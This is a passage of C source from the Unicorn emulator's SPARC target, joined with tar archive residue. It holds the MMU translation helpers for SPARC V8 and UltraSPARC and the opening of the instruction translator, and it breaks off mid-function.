*/ case ASI_EC_W: /* E-cache tag */ case ASI_EC_R: /* E-cache tag */ return; case ASI_IMMU_TSB_8KB_PTR: /* I-MMU 8k TSB pointer, RO */ case ASI_IMMU_TSB_64KB_PTR: /* I-MMU 64k TSB pointer, RO */ case ASI_ITLB_TAG_READ: /* I-MMU tag read, RO */ case ASI_DMMU_TSB_8KB_PTR: /* D-MMU 8k TSB pointer, RO */ case ASI_DMMU_TSB_64KB_PTR: /* D-MMU 64k TSB pointer, RO */ case ASI_DMMU_TSB_DIRECT_PTR: /* D-MMU data pointer, RO */ case ASI_DTLB_TAG_READ: /* D-MMU tag read, RO */ case ASI_INTR_DISPATCH_STAT: /* Interrupt dispatch, RO */ case ASI_INTR_R: /* Incoming interrupt vector, RO */ case ASI_PNF: /* Primary no-fault, RO */ case ASI_SNF: /* Secondary no-fault, RO */ case ASI_PNFL: /* Primary no-fault LE, RO */ case ASI_SNFL: /* Secondary no-fault LE, RO */ default: sparc_raise_mmu_fault(cs, addr, true, false, 1, size, GETPC()); return; } } #endif /* TARGET_SPARC64 */ void sparc_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr) { bool is_write = access_type == MMU_DATA_STORE; bool is_exec = access_type == MMU_INST_FETCH; bool is_asi = false; sparc_raise_mmu_fault(cs, physaddr, is_write, is_exec, is_asi, size, retaddr); } void QEMU_NORETURN sparc_cpu_do_unaligned_access(CPUState *cs, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; #ifdef DEBUG_UNALIGNED printf("Unaligned access to 0x" TARGET_FMT_lx " from 0x" TARGET_FMT_lx "\n", addr, env->pc); #endif cpu_raise_exception_ra(env, TT_UNALIGNED, retaddr); } unicorn-2.1.1/qemu/target/sparc/mmu_helper.c000066400000000000000000000601351467524106700210570ustar00rootroot00000000000000/* * Sparc MMU helpers * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
*/ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" /* Sparc MMU emulation */ #ifndef TARGET_SPARC64 /* * Sparc V8 Reference MMU (SRMMU) */ static const int access_table[8][8] = { { 0, 0, 0, 0, 8, 0, 12, 12 }, { 0, 0, 0, 0, 8, 0, 0, 0 }, { 8, 8, 0, 0, 0, 8, 12, 12 }, { 8, 8, 0, 0, 0, 8, 0, 0 }, { 8, 0, 8, 0, 8, 8, 12, 12 }, { 8, 0, 8, 0, 8, 0, 8, 0 }, { 8, 8, 8, 0, 8, 8, 12, 12 }, { 8, 8, 8, 0, 8, 8, 8, 0 } }; static const int perm_table[2][8] = { { PAGE_READ, PAGE_READ | PAGE_WRITE, PAGE_READ | PAGE_EXEC, PAGE_READ | PAGE_WRITE | PAGE_EXEC, PAGE_EXEC, PAGE_READ | PAGE_WRITE, PAGE_READ | PAGE_EXEC, PAGE_READ | PAGE_WRITE | PAGE_EXEC }, { PAGE_READ, PAGE_READ | PAGE_WRITE, PAGE_READ | PAGE_EXEC, PAGE_READ | PAGE_WRITE | PAGE_EXEC, PAGE_EXEC, PAGE_READ, 0, 0, } }; static int get_physical_address(CPUSPARCState *env, hwaddr *physical, int *prot, int *access_index, MemTxAttrs *attrs, target_ulong address, int rw, int mmu_idx, target_ulong *page_size) { int access_perms = 0; hwaddr pde_ptr; uint32_t pde; int error_code = 0, is_dirty, is_user; unsigned long page_offset; CPUState *cs = env_cpu(env); MemTxResult result; is_user = mmu_idx == MMU_USER_IDX; if (mmu_idx == MMU_PHYS_IDX) { *page_size = TARGET_PAGE_SIZE; /* Boot mode: instruction fetches are taken from PROM */ if (rw == 2 && (env->mmuregs[0] & env->def.mmu_bm)) { *physical = env->prom_addr | (address & 0x7ffffULL); *prot = PAGE_READ | PAGE_EXEC; return 0; } *physical = address; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return 0; } *access_index = ((rw & 1) << 2) | (rw & 2) | (is_user ? 0 : 1); *physical = 0xffffffffffff0000ULL; /* SPARC reference MMU table walk: Context table->L1->L2->PTE */ /* Context base + context number */ pde_ptr = (env->mmuregs[1] << 4) + (env->mmuregs[2] << 2); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return 4 << 2; /* Translation fault, L = 0 */ } /* Ctx pde */ switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ return 1 << 2; case 2: /* L0 PTE, maybe should not happen? 
*/ case 3: /* Reserved */ return 4 << 2; case 1: /* L0 PDE */ pde_ptr = ((address >> 22) & ~3) + ((pde & ~3) << 4); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return (1 << 8) | (4 << 2); /* Translation fault, L = 1 */ } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ return (1 << 8) | (1 << 2); case 3: /* Reserved */ return (1 << 8) | (4 << 2); case 1: /* L1 PDE */ pde_ptr = ((address & 0xfc0000) >> 16) + ((pde & ~3) << 4); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return (2 << 8) | (4 << 2); /* Translation fault, L = 2 */ } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ return (2 << 8) | (1 << 2); case 3: /* Reserved */ return (2 << 8) | (4 << 2); case 1: /* L2 PDE */ pde_ptr = ((address & 0x3f000) >> 10) + ((pde & ~3) << 4); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return (3 << 8) | (4 << 2); /* Translation fault, L = 3 */ } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ return (3 << 8) | (1 << 2); case 1: /* PDE, should not happen */ case 3: /* Reserved */ return (3 << 8) | (4 << 2); case 2: /* L3 PTE */ page_offset = 0; } *page_size = TARGET_PAGE_SIZE; break; case 2: /* L2 PTE */ page_offset = address & 0x3f000; *page_size = 0x40000; } break; case 2: /* L1 PTE */ page_offset = address & 0xfff000; *page_size = 0x1000000; } } /* check access */ access_perms = (pde & PTE_ACCESS_MASK) >> PTE_ACCESS_SHIFT; error_code = access_table[*access_index][access_perms]; if (error_code && !((env->mmuregs[0] & MMU_NF) && is_user)) { return error_code; } /* update page modified and dirty bits */ is_dirty = (rw & 1) && !(pde & PG_MODIFIED_MASK); if (!(pde & PG_ACCESSED_MASK) || is_dirty) { pde |= PG_ACCESSED_MASK; if (is_dirty) { pde |= PG_MODIFIED_MASK; } stl_phys_notdirty(cs->as, pde_ptr, pde); } /* the page can be put in the TLB */ *prot = perm_table[is_user][access_perms]; if (!(pde & PG_MODIFIED_MASK)) { /* only set write access if already dirty... otherwise wait for dirty access */ *prot &= ~PAGE_WRITE; } /* Even if large ptes, we map only one 4KB page in the cache to avoid filling it too fast */ *physical = ((hwaddr)(pde & PTE_ADDR_MASK) << 4) + page_offset; return error_code; } /* Perform address translation */ bool sparc_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; hwaddr paddr; target_ulong vaddr; target_ulong page_size; int error_code = 0, prot, access_index; MemTxAttrs attrs = { 0 }; /* * TODO: If we ever need tlb_vaddr_to_host for this target, * then we must figure out how to manipulate FSR and FAR * when both MMU_NF and probe are set. In the meantime, * do not support this use case. 
*/ assert(!probe); address &= TARGET_PAGE_MASK; error_code = get_physical_address(env, &paddr, &prot, &access_index, &attrs, address, access_type, mmu_idx, &page_size); vaddr = address; if (likely(error_code == 0)) { qemu_log_mask(CPU_LOG_MMU, "Translate at %" VADDR_PRIx " -> " TARGET_FMT_plx ", vaddr " TARGET_FMT_lx "\n", address, paddr, vaddr); tlb_set_page(cs, vaddr, paddr, prot, mmu_idx, page_size); return true; } if (env->mmuregs[3]) { /* Fault status register */ env->mmuregs[3] = 1; /* overflow (not read before another fault) */ } env->mmuregs[3] |= (access_index << 5) | error_code | 2; env->mmuregs[4] = address; /* Fault address register */ if ((env->mmuregs[0] & MMU_NF) || env->psret == 0) { /* No fault mode: if a mapping is available, just override permissions. If no mapping is available, redirect accesses to neverland. Fake/overridden mappings will be flushed when switching to normal mode. */ prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; tlb_set_page(cs, vaddr, paddr, prot, mmu_idx, TARGET_PAGE_SIZE); return true; } else { if (access_type == MMU_INST_FETCH) { cs->exception_index = TT_TFAULT; } else { cs->exception_index = TT_DFAULT; } cpu_loop_exit_restore(cs, retaddr); } } target_ulong mmu_probe(CPUSPARCState *env, target_ulong address, int mmulev) { CPUState *cs = env_cpu(env); hwaddr pde_ptr; uint32_t pde; MemTxResult result; /* * TODO: MMU probe operations are supposed to set the fault * status registers, but we don't do this. */ /* Context base + context number */ pde_ptr = (hwaddr)(env->mmuregs[1] << 4) + (env->mmuregs[2] << 2); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return 0; } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ case 2: /* PTE, maybe should not happen? */ case 3: /* Reserved */ return 0; case 1: /* L1 PDE */ if (mmulev == 3) { return pde; } pde_ptr = ((address >> 22) & ~3) + ((pde & ~3) << 4); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return 0; } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ case 3: /* Reserved */ return 0; case 2: /* L1 PTE */ return pde; case 1: /* L2 PDE */ if (mmulev == 2) { return pde; } pde_ptr = ((address & 0xfc0000) >> 16) + ((pde & ~3) << 4); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return 0; } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ case 3: /* Reserved */ return 0; case 2: /* L2 PTE */ return pde; case 1: /* L3 PDE */ if (mmulev == 1) { return pde; } pde_ptr = ((address & 0x3f000) >> 10) + ((pde & ~3) << 4); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return 0; } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ case 1: /* PDE, should not happen */ case 3: /* Reserved */ return 0; case 2: /* L3 PTE */ return pde; } } } } return 0; } /* Gdb expects all registers windows to be flushed in ram. This function handles * reads (and only reads) in stack frames as if windows were flushed. We assume * that the sparc ABI is followed. 
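Concretely: a window flush would store each window's 8 locals and 8 ins (64 bytes) at that window's %sp, which by the register-window overlap is the %fp/%i6 of the window below, so the loop below walks up the windows and serves any read that falls inside one of those 64-byte save areas directly from env->regbase.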
*/ int sparc_cpu_memory_rw_debug(CPUState *cs, vaddr address, uint8_t *buf, int len, bool is_write) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; target_ulong addr = address; int i; int len1; int cwp = env->cwp; if (!is_write) { for (i = 0; i < env->nwindows; i++) { int off; target_ulong fp = env->regbase[cwp * 16 + 22]; /* Assume fp == 0 means end of frame. */ if (fp == 0) { break; } cwp = cpu_cwp_inc(env, cwp + 1); /* Invalid window ? */ if (env->wim & (1 << cwp)) { break; } /* According to the ABI, the stack is growing downward. */ if (addr + len < fp) { break; } /* Not in this frame. */ if (addr > fp + 64) { continue; } /* Handle access before this window. */ if (addr < fp) { len1 = fp - addr; if (cpu_memory_rw_debug(cs, addr, buf, len1, is_write) != 0) { return -1; } addr += len1; len -= len1; buf += len1; } /* Access byte per byte to registers. Not very efficient but speed * is not critical. */ off = addr - fp; len1 = 64 - off; if (len1 > len) { len1 = len; } for (; len1; len1--) { int reg = cwp * 16 + 8 + (off >> 2); union { uint32_t v; uint8_t c[4]; } u; u.v = cpu_to_be32(env->regbase[reg]); *buf++ = u.c[off & 3]; addr++; len--; off++; } if (len == 0) { return 0; } } } return cpu_memory_rw_debug(cs, addr, buf, len, is_write); } #else /* !TARGET_SPARC64 */ /* 41 bit physical address space */ static inline hwaddr ultrasparc_truncate_physical(uint64_t x) { return x & 0x1ffffffffffULL; } /* * UltraSparc IIi I/DMMUs */ /* Returns true if TTE tag is valid and matches virtual address value in context requires virtual address mask value calculated from TTE entry size */ static inline int ultrasparc_tag_match(SparcTLBEntry *tlb, uint64_t address, uint64_t context, hwaddr *physical) { #ifdef _MSC_VER uint64_t mask = 0 - (8192ULL << 3 * TTE_PGSIZE(tlb->tte)); #else uint64_t mask = -(8192ULL << 3 * TTE_PGSIZE(tlb->tte)); #endif /* valid, context match, virtual address match? */ if (TTE_IS_VALID(tlb->tte) && (TTE_IS_GLOBAL(tlb->tte) || tlb_compare_context(tlb, context)) && compare_masked(address, tlb->tag, mask)) { /* decode physical address */ *physical = ((tlb->tte & mask) | (address & ~mask)) & 0x1ffffffe000ULL; return 1; } return 0; } static int get_physical_address_data(CPUSPARCState *env, hwaddr *physical, int *prot, MemTxAttrs *attrs, target_ulong address, int rw, int mmu_idx) { CPUState *cs = env_cpu(env); unsigned int i; uint64_t context; uint64_t sfsr = 0; bool is_user = false; switch (mmu_idx) { case MMU_PHYS_IDX: g_assert_not_reached(); case MMU_USER_IDX: is_user = true; /* fallthru */ case MMU_KERNEL_IDX: context = env->dmmu.mmu_primary_context & 0x1fff; sfsr |= SFSR_CT_PRIMARY; break; case MMU_USER_SECONDARY_IDX: is_user = true; /* fallthru */ case MMU_KERNEL_SECONDARY_IDX: context = env->dmmu.mmu_secondary_context & 0x1fff; sfsr |= SFSR_CT_SECONDARY; break; case MMU_NUCLEUS_IDX: sfsr |= SFSR_CT_NUCLEUS; /* FALLTHRU */ default: context = 0; break; } if (rw == 1) { sfsr |= SFSR_WRITE_BIT; } else if (rw == 4) { sfsr |= SFSR_NF_BIT; } for (i = 0; i < 64; i++) { /* ctx match, vaddr match, valid? */ if (ultrasparc_tag_match(&env->dtlb[i], address, context, physical)) { int do_fault = 0; if (TTE_IS_IE(env->dtlb[i].tte)) { attrs->byte_swap = true; } /* access ok? 
*/ /* multiple bits in SFSR.FT may be set on TT_DFAULT */ if (TTE_IS_PRIV(env->dtlb[i].tte) && is_user) { do_fault = 1; sfsr |= SFSR_FT_PRIV_BIT; /* privilege violation */ } if (rw == 4) { if (TTE_IS_SIDEEFFECT(env->dtlb[i].tte)) { do_fault = 1; sfsr |= SFSR_FT_NF_E_BIT; } } else { if (TTE_IS_NFO(env->dtlb[i].tte)) { do_fault = 1; sfsr |= SFSR_FT_NFO_BIT; } } if (do_fault) { /* faults above are reported with TT_DFAULT. */ cs->exception_index = TT_DFAULT; } else if (!TTE_IS_W_OK(env->dtlb[i].tte) && (rw == 1)) { do_fault = 1; cs->exception_index = TT_DPROT; } if (!do_fault) { *prot = PAGE_READ; if (TTE_IS_W_OK(env->dtlb[i].tte)) { *prot |= PAGE_WRITE; } TTE_SET_USED(env->dtlb[i].tte); return 0; } if (env->dmmu.sfsr & SFSR_VALID_BIT) { /* Fault status register */ sfsr |= SFSR_OW_BIT; /* overflow (not read before another fault) */ } if (env->pstate & PS_PRIV) { sfsr |= SFSR_PR_BIT; } /* FIXME: ASI field in SFSR must be set */ env->dmmu.sfsr = sfsr | SFSR_VALID_BIT; env->dmmu.sfar = address; /* Fault address register */ env->dmmu.tag_access = (address & ~0x1fffULL) | context; return 1; } } /* * On MMU misses: * - UltraSPARC IIi: SFSR and SFAR unmodified * - JPS1: SFAR updated and some fields of SFSR updated */ env->dmmu.tag_access = (address & ~0x1fffULL) | context; cs->exception_index = TT_DMISS; return 1; } static int get_physical_address_code(CPUSPARCState *env, hwaddr *physical, int *prot, MemTxAttrs *attrs, target_ulong address, int mmu_idx) { CPUState *cs = env_cpu(env); unsigned int i; uint64_t context; bool is_user = false; switch (mmu_idx) { case MMU_PHYS_IDX: case MMU_USER_SECONDARY_IDX: case MMU_KERNEL_SECONDARY_IDX: g_assert_not_reached(); case MMU_USER_IDX: is_user = true; /* fallthru */ case MMU_KERNEL_IDX: context = env->dmmu.mmu_primary_context & 0x1fff; break; default: context = 0; break; } if (env->tl == 0) { /* PRIMARY context */ context = env->dmmu.mmu_primary_context & 0x1fff; } else { /* NUCLEUS context */ context = 0; } for (i = 0; i < 64; i++) { /* ctx match, vaddr match, valid? */ if (ultrasparc_tag_match(&env->itlb[i], address, context, physical)) { /* access ok? */ if (TTE_IS_PRIV(env->itlb[i].tte) && is_user) { /* Fault status register */ if (env->immu.sfsr & SFSR_VALID_BIT) { env->immu.sfsr = SFSR_OW_BIT; /* overflow (not read before another fault) */ } else { env->immu.sfsr = 0; } if (env->pstate & PS_PRIV) { env->immu.sfsr |= SFSR_PR_BIT; } if (env->tl > 0) { env->immu.sfsr |= SFSR_CT_NUCLEUS; } /* FIXME: ASI field in SFSR must be set */ env->immu.sfsr |= SFSR_FT_PRIV_BIT | SFSR_VALID_BIT; cs->exception_index = TT_TFAULT; env->immu.tag_access = (address & ~0x1fffULL) | context; return 1; } *prot = PAGE_EXEC; TTE_SET_USED(env->itlb[i].tte); return 0; } } /* Context is stored in DMMU (dmmuregs[1]) also for IMMU */ env->immu.tag_access = (address & ~0x1fffULL) | context; cs->exception_index = TT_TMISS; return 1; } static int get_physical_address(CPUSPARCState *env, hwaddr *physical, int *prot, int *access_index, MemTxAttrs *attrs, target_ulong address, int rw, int mmu_idx, target_ulong *page_size) { /* ??? We treat everything as a small page, then explicitly flush everything when an entry is evicted. 
*/ *page_size = TARGET_PAGE_SIZE; #if 0 /* safety net to catch wrong softmmu index use from dynamic code */ if (env->tl > 0 && mmu_idx != MMU_NUCLEUS_IDX) { if (rw == 2) { trace_mmu_helper_get_phys_addr_code(env->tl, mmu_idx, env->dmmu.mmu_primary_context, env->dmmu.mmu_secondary_context, address); } else { trace_mmu_helper_get_phys_addr_data(env->tl, mmu_idx, env->dmmu.mmu_primary_context, env->dmmu.mmu_secondary_context, address); } } #endif if (mmu_idx == MMU_PHYS_IDX) { *physical = ultrasparc_truncate_physical(address); *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return 0; } if (rw == 2) { return get_physical_address_code(env, physical, prot, attrs, address, mmu_idx); } else { return get_physical_address_data(env, physical, prot, attrs, address, rw, mmu_idx); } } /* Perform address translation */ bool sparc_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; target_ulong vaddr; hwaddr paddr; target_ulong page_size; MemTxAttrs attrs = { 0 }; int error_code = 0, prot, access_index; address &= TARGET_PAGE_MASK; error_code = get_physical_address(env, &paddr, &prot, &access_index, &attrs, address, access_type, mmu_idx, &page_size); if (likely(error_code == 0)) { vaddr = address; tlb_set_page_with_attrs(cs, vaddr, paddr, attrs, prot, mmu_idx, page_size); return true; } if (probe) { return false; } cpu_loop_exit_restore(cs, retaddr); } #endif /* TARGET_SPARC64 */ static int cpu_sparc_get_phys_page(CPUSPARCState *env, hwaddr *phys, target_ulong addr, int rw, int mmu_idx) { target_ulong page_size; int prot, access_index; MemTxAttrs attrs = { 0 }; return get_physical_address(env, phys, &prot, &access_index, &attrs, addr, rw, mmu_idx, &page_size); } #if defined(TARGET_SPARC64) hwaddr cpu_get_phys_page_nofault(CPUSPARCState *env, target_ulong addr, int mmu_idx) { hwaddr phys_addr; if (cpu_sparc_get_phys_page(env, &phys_addr, addr, 4, mmu_idx) != 0) { return -1; } return phys_addr; } #endif hwaddr sparc_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; hwaddr phys_addr; int mmu_idx = cpu_mmu_index(env, false); if (cpu_sparc_get_phys_page(env, &phys_addr, addr, 2, mmu_idx) != 0) { if (cpu_sparc_get_phys_page(env, &phys_addr, addr, 0, mmu_idx) != 0) { return -1; } } return phys_addr; } unicorn-2.1.1/qemu/target/sparc/translate.c000066400000000000000000007123041467524106700207210ustar00rootroot00000000000000/* SPARC translation Copyright (C) 2003 Thomas M. 
Ogrisegg <tom@fnord.at> Copyright (C) 2003-2005 Fabrice Bellard This library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "exec/cpu_ldst.h" #include "exec/helper-gen.h" #include "exec/translator.h" #include "asi.h" #define DEBUG_DISAS #define DYNAMIC_PC 1 /* dynamic pc value */ #define JUMP_PC 2 /* dynamic pc value which takes only two values according to jump_pc[T2] */ #define DISAS_EXIT DISAS_TARGET_0 #include "exec/gen-icount.h" typedef struct DisasContext { DisasContextBase base; target_ulong pc; /* current Program Counter: integer or DYNAMIC_PC */ target_ulong npc; /* next PC: integer or DYNAMIC_PC or JUMP_PC */ target_ulong jump_pc[2]; /* used when JUMP_PC pc value is used */ int mem_idx; bool fpu_enabled; bool address_mask_32bit; bool supervisor; #ifdef TARGET_SPARC64 bool hypervisor; #endif uint32_t cc_op; /* current CC operation */ sparc_def_t *def; TCGv_i32 t32[3]; TCGv ttl[5]; int n_t32; int n_ttl; #ifdef TARGET_SPARC64 int fprs_dirty; int asi; #endif // Unicorn struct uc_struct *uc; } DisasContext; typedef struct { TCGCond cond; bool is_bool; bool g1, g2; TCGv c1, c2; } DisasCompare; // This function uses non-native bit order #define GET_FIELD(X, FROM, TO) \ ((X) >> (31 - (TO)) & ((1 << ((TO) - (FROM) + 1)) - 1)) // This function uses the order in the manuals, i.e. bit 0 is 2^0 #define GET_FIELD_SP(X, FROM, TO) \ GET_FIELD(X, 31 - (TO), 31 - (FROM)) #define GET_FIELDs(x,a,b) sign_extend (GET_FIELD(x,a,b), (b) - (a) + 1) #define GET_FIELD_SPs(x,a,b) sign_extend (GET_FIELD_SP(x,a,b), ((b) - (a) + 1)) #ifdef TARGET_SPARC64 #define DFPREG(r) (((r & 1) << 5) | (r & 0x1e)) #define QFPREG(r) (((r & 1) << 5) | (r & 0x1c)) #else #define DFPREG(r) (r & 0x1e) #define QFPREG(r) (r & 0x1c) #endif #define UA2005_HTRAP_MASK 0xff #define V8_TRAP_MASK 0x7f static int sign_extend(int x, int len) { len = 32 - len; return (x << len) >> len; } #define IS_IMM (insn & (1<<13)) static inline TCGv_i32 get_temp_i32(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 t; assert(dc->n_t32 < ARRAY_SIZE(dc->t32)); dc->t32[dc->n_t32++] = t = tcg_temp_new_i32(tcg_ctx); return t; } static inline TCGv get_temp_tl(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv t; assert(dc->n_ttl < ARRAY_SIZE(dc->ttl)); dc->ttl[dc->n_ttl++] = t = tcg_temp_new(tcg_ctx); return t; } static inline void gen_update_fprs_dirty(DisasContext *dc, int rd) { #if defined(TARGET_SPARC64) int bit = (rd < 32) ? 1 : 2; TCGContext *tcg_ctx = dc->uc->tcg_ctx; /* If we know we've already set this bit within the TB, we can avoid setting it again. 
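dc->fprs_dirty tracks, within the current TB, which FPRS dirty bits (DL = 1 for f0-f31, DU = 2 for f32-f63) have already been ORed into cpu_fprs.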
*/ if (!(dc->fprs_dirty & bit)) { dc->fprs_dirty |= bit; tcg_gen_ori_i32(tcg_ctx, tcg_ctx->cpu_fprs, tcg_ctx->cpu_fprs, bit); } #endif } /* floating point registers moves */ static TCGv_i32 gen_load_fpr_F(DisasContext *dc, unsigned int src) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; #if TCG_TARGET_REG_BITS == 32 if (src & 1) { return TCGV_LOW(tcg_ctx, tcg_ctx->cpu_fpr[src / 2]); } else { return TCGV_HIGH(tcg_ctx, tcg_ctx->cpu_fpr[src / 2]); } #else TCGv_i32 ret = get_temp_i32(dc); if (src & 1) { tcg_gen_extrl_i64_i32(tcg_ctx, ret, tcg_ctx->cpu_fpr[src / 2]); } else { tcg_gen_extrh_i64_i32(tcg_ctx, ret, tcg_ctx->cpu_fpr[src / 2]); } return ret; #endif } static void gen_store_fpr_F(DisasContext *dc, unsigned int dst, TCGv_i32 v) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; #if TCG_TARGET_REG_BITS == 32 if (dst & 1) { tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2]), v); } else { tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2]), v); } #else TCGv_i64 t = (TCGv_i64)v; tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], tcg_ctx->cpu_fpr[dst / 2], t, (dst & 1 ? 0 : 32), 32); #endif gen_update_fprs_dirty(dc, dst); } static TCGv_i32 gen_dest_fpr_F(DisasContext *dc) { return get_temp_i32(dc); } static TCGv_i64 gen_load_fpr_D(DisasContext *dc, unsigned int src) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; src = DFPREG(src); return tcg_ctx->cpu_fpr[src / 2]; } static void gen_store_fpr_D(DisasContext *dc, unsigned int dst, TCGv_i64 v) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; dst = DFPREG(dst); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], v); gen_update_fprs_dirty(dc, dst); } static TCGv_i64 gen_dest_fpr_D(DisasContext *dc, unsigned int dst) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; return tcg_ctx->cpu_fpr[DFPREG(dst) / 2]; } static void gen_op_load_fpr_QT0(TCGContext *tcg_ctx, unsigned int src) { tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src / 2], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + offsetof(CPU_QuadU, ll.upper)); tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src/2 + 1], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + offsetof(CPU_QuadU, ll.lower)); } static void gen_op_load_fpr_QT1(TCGContext *tcg_ctx, unsigned int src) { tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src / 2], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt1) + offsetof(CPU_QuadU, ll.upper)); tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src/2 + 1], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt1) + offsetof(CPU_QuadU, ll.lower)); } static void gen_op_store_QT0_fpr(TCGContext *tcg_ctx, unsigned int dst) { tcg_gen_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + offsetof(CPU_QuadU, ll.upper)); tcg_gen_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst/2 + 1], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + offsetof(CPU_QuadU, ll.lower)); } static void gen_store_fpr_Q(DisasContext *dc, unsigned int dst, TCGv_i64 v1, TCGv_i64 v2) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; dst = QFPREG(dst); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], v1); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2 + 1], v2); gen_update_fprs_dirty(dc, dst); } #ifdef TARGET_SPARC64 static TCGv_i64 gen_load_fpr_Q0(DisasContext *dc, unsigned int src) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; src = QFPREG(src); return tcg_ctx->cpu_fpr[src / 2]; } static TCGv_i64 gen_load_fpr_Q1(DisasContext *dc, unsigned int src) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; src = QFPREG(src); return tcg_ctx->cpu_fpr[src / 2 + 1]; } static void gen_move_Q(DisasContext *dc, unsigned int rd, unsigned int rs) { TCGContext 
